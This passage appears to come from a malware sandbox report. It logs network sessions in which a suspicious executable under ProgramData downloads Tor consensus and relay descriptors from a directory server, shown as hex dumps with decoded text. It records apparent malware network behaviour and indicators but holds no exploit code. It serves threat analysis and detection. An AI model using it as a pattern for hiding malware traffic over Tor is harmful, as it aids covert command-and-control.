                          Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 32 2d 31 32 2d 31 31 20 30 38 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 30 39 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 31 31 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 42 75 72 73 74 3d 36 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61
                          Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2022-12-11 08:00:00fresh-until 2022-12-11 09:00:00valid-until 2022-12-11 11:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCrea
                          Dec 11, 2022 09:27:07.636723042 CET7921INData Raw: 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 31 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 4d 69 6e 43 6f 6e 6e 65 63 74 69 6f 6e 73 3d 32 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 52 61 74 65 3d 32 20 44 6f 53 43 6f 6e 6e 65
                          Data Ascii: tionEnabled=1 DoSCircuitCreationMinConnections=2 DoSCircuitCreationRate=2 DoSConnectionEnabled=1 DoSConnectionMaxConcurrentCount=50 DoSRefuseSingleHopClientRendezvous=1 ExtendByEd25519ID=1 KISTSchedRunInterval=2 NumNTorsPerTAP=100 UseOptimisti
                          Dec 11, 2022 09:27:07.658849955 CET7922INData Raw: 65 5f 70 65 72 63 65 6e 74 3d 35 30 30 20 73 65 6e 64 6d 65 5f 65 6d 69 74 5f 6d 69 6e 5f 76 65 72 73 69 6f 6e 3d 31 0a 73 68 61 72 65 64 2d 72 61 6e 64 2d 70 72 65 76 69 6f 75 73 2d 76 61 6c 75 65 20 38 20 4f 55 58 73 33 33 5a 36 6a 77 43 61 43
                          Data Ascii: e_percent=500 sendme_emit_min_version=1shared-rand-previous-value 8 OUXs33Z6jwCaC7+01M0edsV3bfQTozE0XT1G+S9nMBM=shared-rand-current-value 8 zXIuCMixcVdQiw7MqOKRh96/AoG3SQusUgMfgw4Gezk=dir-source dannenberg 0232AF901C31A04EE9848595AF9BB7620D
                          Dec 11, 2022 09:27:07.658931017 CET7923INData Raw: 36 36 2e 33 33 2e 34 35 20 38 30 20 34 34 33 0a 63 6f 6e 74 61 63 74 20 65 6d 61 69 6c 3a 75 73 75 72 61 5b 5d 73 61 62 6f 74 61 67 65 2e 6f 72 67 20 75 72 6c 3a 68 74 74 70 73 3a 2f 2f 33 38 36 62 73 64 2e 6e 65 74 20 70 72 6f 6f 66 3a 75 72 69
                          Data Ascii: 66.33.45 80 443contact email:usura[]sabotage.org url:https://386bsd.net proof:uri-rsa abuse:abuse[]sabotage.net twitter:adejoode ciissversion:2vote-digest 69686C901A02C875F25F646E9DE068CADA61BFB9dir-source gabelmoo ED03BB616EB2F60BEC8015111


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.349702151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:18.045205116 CET2647OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:18.094584942 CET2649INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:18 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:18 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.349703151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:18.532134056 CET2652OUTGET /tor/server/fp/aacd4e09e65ba18caf35fbc855ef659505b36e9e HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:18.583761930 CET2653INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:18 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:18 GMT
                          Data Raw: 72 6f 75 74 65 72 20 61 72 74 69 6b 65 6c 31 30 62 65 72 32 38 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 34 20 39 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 44 41 65 2f 4f 76 62 48 68 34 6b 38 71 6e 50 4c 69 6e 6e 50 6c 70 67 5a 68 6c 38 4a 74 34 6e 64 4a 79 6c 32 4f 66 4c 35 51 4a 6b 6e 49 41 51 41 67 42 41 41 43 6e 49 42 32 0a 6c 50 78 61 48 36 54 30 6b 58 4b 69 75 51 39 72 32 36 46 39 76 79 4b 44 4f 58 57 39 75 6b 53 57 66 56 54 65 4e 34 42 70 4c 36 74 33 2b 45 69 45 67 65 69 32 63 4a 33 71 61 53 2f 45 58 53 6a 49 0a 6b 54 41 6d 6e 48 4a 37 38 49 6f 66 69 73 73 48 43 63 70 6e 59 74 62 74 53 44 63 55 6c 5a 7a 54 45 65 4e 73 39 37 55 62 38 36 4e 64 50 39 74 48 35 6f 48 5a 36 54 6f 2b 54 77 77 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 41 70 79 41 64 70 54 38 57 68 2b 6b 39 4a 46 79 6f 72 6b 50 61 39 75 68 66 62 38 69 67 7a 6c 31 76 62 70 45 6c 6e 31 55 33 6a 63 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 3a 31 34 5d 3a 39 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 32 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 34 3a 31 32 3a 35 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 41 41 43 44 20 34 45 30 39 20 45 36 35 42 20 41 31 38 43 20 41 46 33 35 20 46 42 43 38 20 35 35 45 46 20 36 35 39 35 20 30 35 42 33 20 36 45 39 45 0a 75 70 74 69 6d 65 20 32 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 34 30 37 31 39 33 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 36 44 34 31 46 37 39 35 31 34 30 43 41 33 35 44 42 46 44 30 39 46 35 37 42 44 33 45 38 44 38 37 39 31 38 42 35 43 39 20 49 6e 6d 77 34 68 50 69 68 31 7a 58 77 4c 61 44 4a 50 79 58 65 58 34 55 36 30 59 70 4a 56 77 39 77 53 65 37 77 6a 45 43 44 2f 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4d 74 37 37 62 5a 6e 2f 79 54 67 43 4c 67 31 67 75 6c 52 6a 75 63 30 41 44 63 4e 6c 30 65 63 77 7a 75 71 7a 67 5a 78 73 74 44 70 78 57 6d 2f 45 7a 2f 2f 78 62 44 0a 50 48 62 7a 58 4f 43 55 4a 39 4e 4d 64 50 4d 7a 2f 39 34 56 64 2b 34 48 54 33 76 41 64 2b 31 6b 62 45 61 65 6e 70 38 4e 35 4d 54 5a 41 68 50 30 4c 50 59 62 61 50 39 75 6f 74 39 57 73 5a 5a 71 0a 51 45 49 76 77 59 30 34 68 35 42 36 45 67 44 76 61 4e 33 6a 63 62 64 7a 6e 55 68 50 35 38 6d 39 64 71 33 32 66 52 67 4f 38 33 71 50 39 4e 55 48 46 36 30 2f 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20
                          Data Ascii: router artikel10ber28 185.220.101.14 9443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdDAe/OvbHh4k8qnPLinnPlpgZhl8Jt4ndJyl2OfL5QJknIAQAgBAACnIB2lPxaH6T0kXKiuQ9r26F9vyKDOXW9ukSWfVTeN4BpL6t3+EiEgei2cJ3qaS/EXSjIkTAmnHJ78IofissHCcpnYtbtSDcUlZzTEeNs97Ub86NdP9tH5oHZ6To+Tww=-----END ED25519 CERT-----master-key-ed25519 ApyAdpT8Wh+k9JFyorkPa9uhfb8igzl1vbpEln1U3jcor-address [2a0b:f4c2::14]:9443platform Tor 0.4.7.12 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 04:12:57fingerprint AACD 4E09 E65B A18C AF35 FBC8 55EF 6595 05B3 6E9Euptime 2bandwidth 1073741824 1073741824 44071936extra-info-digest E6D41F795140CA35DBFD09F57BD3E8D87918B5C9 Inmw4hPih1zXwLaDJPyXeX4U60YpJVw9wSe7wjECD/8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMMt77bZn/yTgCLg1gulRjuc0ADcNl0ecwzuqzgZxstDpxWm/Ez//xbDPHbzXOCUJ9NMdPMz/94Vd+4HT3vAd+1kbEaenp8N5MTZAhP0LPYbaP9uot9WsZZqQEIvwY04h5B6EgDvaN3jcbdznUhP58m9dq32fRgO83qP9NUHF60/AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          7192.168.2.349704151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:19.465193987 CET2663OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:19.513468981 CET2664INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:19 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:19 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
